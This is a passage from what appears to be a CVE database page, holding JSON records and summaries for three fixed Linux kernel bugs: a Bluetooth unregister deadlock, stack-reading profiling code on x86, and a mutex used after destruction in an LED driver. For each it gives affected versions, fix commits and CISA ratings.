            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48542881997e17b49dc16b93fe910e0cfcf7a9f9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9cfc84b1d464cc024286f42a090718f9067b80ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ddeda6ca5f218b668b560d90fc31ae469adbfd92"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d2ce562a5aff1dcd0c50d9808ea825ef90da909f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/96600c2e5ee8213dbab5df1617293d8e847bb4fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d6cbce18370641a21dd889e8613d8153df15eb39"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f939bd73fed12dddc2a32a76116c19ca47c7678"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0d151a103775dd9645c78c97f77d6e2a5298d913"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41063",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:02.545206Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:59.040Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "48542881997e17b49dc16b93fe910e0cfcf7a9f9",
              "status": "affected",
              "version": "e0b278650f07acf2e0932149183458468a731c03",
              "versionType": "git"
            },
            {
              "lessThan": "9cfc84b1d464cc024286f42a090718f9067b80ed",
              "status": "affected",
              "version": "98fb98fd37e42fd4ce13ff657ea64503e24b6090",
              "versionType": "git"
            },
            {
              "lessThan": "ddeda6ca5f218b668b560d90fc31ae469adbfd92",
              "status": "affected",
              "version": "6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2",
              "versionType": "git"
            },
            {
              "lessThan": "d2ce562a5aff1dcd0c50d9808ea825ef90da909f",
              "status": "affected",
              "version": "da4569d450b193e39e87119fd316c0291b585d14",
              "versionType": "git"
            },
            {
              "lessThan": "96600c2e5ee8213dbab5df1617293d8e847bb4fa",
              "status": "affected",
              "version": "45085686b9559bfbe3a4f41d3d695a520668f5e1",
              "versionType": "git"
            },
            {
              "lessThan": "d6cbce18370641a21dd889e8613d8153df15eb39",
              "status": "affected",
              "version": "2ab9a19d896f5a0dd386e1f001c5309bc35f433b",
              "versionType": "git"
            },
            {
              "lessThan": "3f939bd73fed12dddc2a32a76116c19ca47c7678",
              "status": "affected",
              "version": "2449007d3f73b2842c9734f45f0aadb522daf592",
              "versionType": "git"
            },
            {
              "lessThan": "0d151a103775dd9645c78c97f77d6e2a5298d913",
              "status": "affected",
              "version": "2449007d3f73b2842c9734f45f0aadb522daf592",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "dd594cdc24f2e48dab441732e6dfcafd6b0711d1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "4.19.309",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "5.4.271",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "5.10.212",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "5.15.151",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "6.1.81",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "6.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_core: cancel all works upon hci_unregister_dev()\n\nsyzbot is reporting that calling hci_release_dev() from hci_error_reset()\ndue to hci_dev_put() from hci_error_reset() can cause deadlock at\ndestroy_workqueue(), for hci_error_reset() is called from\nhdev-\u003ereq_workqueue which destroy_workqueue() needs to flush.\n\nWe need to make sure that hdev-\u003e{rx_work,cmd_work,tx_work} which are\nqueued into hdev-\u003eworkqueue and hdev-\u003e{power_on,error_reset} which are\nqueued into hdev-\u003ereq_workqueue are no longer running by the moment\n\n       destroy_workqueue(hdev-\u003eworkqueue);\n       destroy_workqueue(hdev-\u003ereq_workqueue);\n\nare called from hci_release_dev().\n\nCall cancel_work_sync() on these work items from hci_unregister_dev()\nas soon as hdev-\u003elist is removed from hci_dev_list."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:29.680Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/48542881997e17b49dc16b93fe910e0cfcf7a9f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/9cfc84b1d464cc024286f42a090718f9067b80ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/ddeda6ca5f218b668b560d90fc31ae469adbfd92"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2ce562a5aff1dcd0c50d9808ea825ef90da909f"
        },
        {
          "url": "https://git.kernel.org/stable/c/96600c2e5ee8213dbab5df1617293d8e847bb4fa"
        },
        {
          "url": "https://git.kernel.org/stable/c/d6cbce18370641a21dd889e8613d8153df15eb39"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f939bd73fed12dddc2a32a76116c19ca47c7678"
        },
        {
          "url": "https://git.kernel.org/stable/c/0d151a103775dd9645c78c97f77d6e2a5298d913"
        }
      ],
      "title": "Bluetooth: hci_core: cancel all works upon hci_unregister_dev()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41063",
    "datePublished": "2024-07-29T14:57:25.154Z",
    "dateReserved": "2024-07-12T12:17:45.628Z",
    "dateUpdated": "2026-01-05T10:37:29.680Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42096 (GCVE-0-2024-42096)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2026-01-05 11:37

Title

x86: stop playing stack games in profile_pc()

Summary

In the Linux kernel, the following vulnerability has been resolved: x86: stop playing stack games in profile_pc() The 'profile_pc()' function is used for timer-based profiling, which isn't really all that relevant any more to begin with, but it also ends up making assumptions based on the stack layout that aren't necessarily valid. Basically, the code tries to account the time spent in spinlocks to the caller rather than the spinlock, and while I support that as a concept, it's not worth the code complexity or the KASAN warnings when no serious profiling is done using timers anyway these days. And the code really does depend on stack layout that is only true in the simplest of cases. We've lost the comment at some point (I think when the 32-bit and 64-bit code was unified), but it used to say: Assume the lock function has either no stack frame or a copy of eflags from PUSHF. which explains why it just blindly loads a word or two straight off the stack pointer and then takes a minimal look at the values to just check if they might be eflags or the return pc: Eflags always has bits 22 and up cleared unlike kernel addresses but that basic stack layout assumption assumes that there isn't any lock debugging etc going on that would complicate the code and cause a stack frame. It causes KASAN unhappiness reported for years by syzkaller [1] and others [2]. With no real practical reason for this any more, just remove the code. Just for historical interest, here's some background commits relating to this code from 2006: 0cb91a229364 ("i386: Account spinlocks to the caller during profiling for !FP kernels") 31679f38d886 ("Simplify profile_pc on x86-64") and a code unification from 2009: ef4512882dbe ("x86: time_32/64.c unify profile_pc") but the basics of this thing actually goes back to before the git tree.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/65ebdde16e7f5da99…
	https://git.kernel.org/stable/c/27c3be840911b15a3…
	https://git.kernel.org/stable/c/49c09ca35a5f521d7…
	https://git.kernel.org/stable/c/2d07fea561d64357f…
	https://git.kernel.org/stable/c/161cef818545ecf98…
	https://git.kernel.org/stable/c/16222beb9f8e5ceb0…
	https://git.kernel.org/stable/c/a3b65c8cbc139bfce…
	https://git.kernel.org/stable/c/093d9603b60093a9a…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 65ebdde16e7f5da99dbf8a548fb635837d78384e (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 27c3be840911b15a3f24ed623f86153c825b6b29 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 49c09ca35a5f521d7fa18caf62fdf378f15e8aa4 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 2d07fea561d64357fb7b3f3751e653bf20306d77 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 161cef818545ecf980f0e2ebaf8ba7326ce53c2b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 16222beb9f8e5ceb0beeb5cbe54bef16df501a92 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < a3b65c8cbc139bfce9541bc81c1bb766e5ba3f68 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 093d9603b60093a9aaae942db56107f6432a5dca (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:30.636Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/65ebdde16e7f5da99dbf8a548fb635837d78384e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/27c3be840911b15a3f24ed623f86153c825b6b29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/49c09ca35a5f521d7fa18caf62fdf378f15e8aa4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d07fea561d64357fb7b3f3751e653bf20306d77"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/161cef818545ecf980f0e2ebaf8ba7326ce53c2b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/16222beb9f8e5ceb0beeb5cbe54bef16df501a92"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a3b65c8cbc139bfce9541bc81c1bb766e5ba3f68"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/093d9603b60093a9aaae942db56107f6432a5dca"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42096",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:21.628470Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:00.264Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kernel/time.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "65ebdde16e7f5da99dbf8a548fb635837d78384e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "27c3be840911b15a3f24ed623f86153c825b6b29",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "49c09ca35a5f521d7fa18caf62fdf378f15e8aa4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "2d07fea561d64357fb7b3f3751e653bf20306d77",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "161cef818545ecf980f0e2ebaf8ba7326ce53c2b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "16222beb9f8e5ceb0beeb5cbe54bef16df501a92",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "a3b65c8cbc139bfce9541bc81c1bb766e5ba3f68",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "093d9603b60093a9aaae942db56107f6432a5dca",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/kernel/time.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86: stop playing stack games in profile_pc()\n\nThe \u0027profile_pc()\u0027 function is used for timer-based profiling, which\nisn\u0027t really all that relevant any more to begin with, but it also ends\nup making assumptions based on the stack layout that aren\u0027t necessarily\nvalid.\n\nBasically, the code tries to account the time spent in spinlocks to the\ncaller rather than the spinlock, and while I support that as a concept,\nit\u0027s not worth the code complexity or the KASAN warnings when no serious\nprofiling is done using timers anyway these days.\n\nAnd the code really does depend on stack layout that is only true in the\nsimplest of cases.  We\u0027ve lost the comment at some point (I think when\nthe 32-bit and 64-bit code was unified), but it used to say:\n\n\tAssume the lock function has either no stack frame or a copy\n\tof eflags from PUSHF.\n\nwhich explains why it just blindly loads a word or two straight off the\nstack pointer and then takes a minimal look at the values to just check\nif they might be eflags or the return pc:\n\n\tEflags always has bits 22 and up cleared unlike kernel addresses\n\nbut that basic stack layout assumption assumes that there isn\u0027t any lock\ndebugging etc going on that would complicate the code and cause a stack\nframe.\n\nIt causes KASAN unhappiness reported for years by syzkaller [1] and\nothers [2].\n\nWith no real practical reason for this any more, just remove the code.\n\nJust for historical interest, here\u0027s some background commits relating to\nthis code from 2006:\n\n  0cb91a229364 (\"i386: Account spinlocks to the caller during profiling for !FP kernels\")\n  31679f38d886 (\"Simplify profile_pc on x86-64\")\n\nand a code unification from 2009:\n\n  ef4512882dbe (\"x86: time_32/64.c unify profile_pc\")\n\nbut the basics of this thing actually goes back to before the git tree."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T11:37:35.340Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/65ebdde16e7f5da99dbf8a548fb635837d78384e"
        },
        {
          "url": "https://git.kernel.org/stable/c/27c3be840911b15a3f24ed623f86153c825b6b29"
        },
        {
          "url": "https://git.kernel.org/stable/c/49c09ca35a5f521d7fa18caf62fdf378f15e8aa4"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d07fea561d64357fb7b3f3751e653bf20306d77"
        },
        {
          "url": "https://git.kernel.org/stable/c/161cef818545ecf980f0e2ebaf8ba7326ce53c2b"
        },
        {
          "url": "https://git.kernel.org/stable/c/16222beb9f8e5ceb0beeb5cbe54bef16df501a92"
        },
        {
          "url": "https://git.kernel.org/stable/c/a3b65c8cbc139bfce9541bc81c1bb766e5ba3f68"
        },
        {
          "url": "https://git.kernel.org/stable/c/093d9603b60093a9aaae942db56107f6432a5dca"
        }
      ],
      "title": "x86: stop playing stack games in profile_pc()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42096",
    "datePublished": "2024-07-29T17:39:31.620Z",
    "dateReserved": "2024-07-29T15:50:41.173Z",
    "dateUpdated": "2026-01-05T11:37:35.340Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42128 (GCVE-0-2024-42128)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-07-28 11:16

Title

leds: an30259a: Use devm_mutex_init() for mutex initialization

Summary

In the Linux kernel, the following vulnerability has been resolved: leds: an30259a: Use devm_mutex_init() for mutex initialization In this driver LEDs are registered using devm_led_classdev_register() so they are automatically unregistered after module's remove() is done. led_classdev_unregister() calls module's led_set_brightness() to turn off the LEDs and that callback uses mutex which was destroyed already in module's remove() so use devm API instead.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3ead19aa341de89a8…
	https://git.kernel.org/stable/c/9dba44460bfca657c…
	https://git.kernel.org/stable/c/c382e2e3eccb6b7ca…

Impacted products

Vendor

Product

Version

Linux

Affected: 2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9 , < 3ead19aa341de89a8c3d88a091d8093ebea622e8 (git)
Affected: 2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9 , < 9dba44460bfca657ca43f03ea9bafa4f9f7dd077 (git)
Affected: 2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9 , < c382e2e3eccb6b7ca8c7aff5092c1668428e7de6 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:31.855Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ead19aa341de89a8c3d88a091d8093ebea622e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9dba44460bfca657ca43f03ea9bafa4f9f7dd077"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c382e2e3eccb6b7ca8c7aff5092c1668428e7de6"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42128",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:35.114946Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:04.248Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/leds/leds-an30259a.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3ead19aa341de89a8c3d88a091d8093ebea622e8",
              "status": "affected",
              "version": "2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9",
              "versionType": "git"
            },
            {
              "lessThan": "9dba44460bfca657ca43f03ea9bafa4f9f7dd077",
              "status": "affected",
              "version": "2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9",
              "versionType": "git"
            },
            {
              "lessThan": "c382e2e3eccb6b7ca8c7aff5092c1668428e7de6",
              "status": "affected",
              "version": "2d00f35c55e74fcb5626c9aa336c1ed697cd2ae9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/leds/leds-an30259a.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nleds: an30259a: Use devm_mutex_init() for mutex initialization\n\nIn this driver LEDs are registered using devm_led_classdev_register()\nso they are automatically unregistered after module\u0027s remove() is done.\nled_classdev_unregister() calls module\u0027s led_set_brightness() to turn off\nthe LEDs and that callback uses mutex which was destroyed already\nin module\u0027s remove() so use devm API instead."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-28T11:16:38.410Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3ead19aa341de89a8c3d88a091d8093ebea622e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9dba44460bfca657ca43f03ea9bafa4f9f7dd077"
        },
        {
          "url": "https://git.kernel.org/stable/c/c382e2e3eccb6b7ca8c7aff5092c1668428e7de6"
        }
      ],
      "title": "leds: an30259a: Use devm_mutex_init() for mutex initialization",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
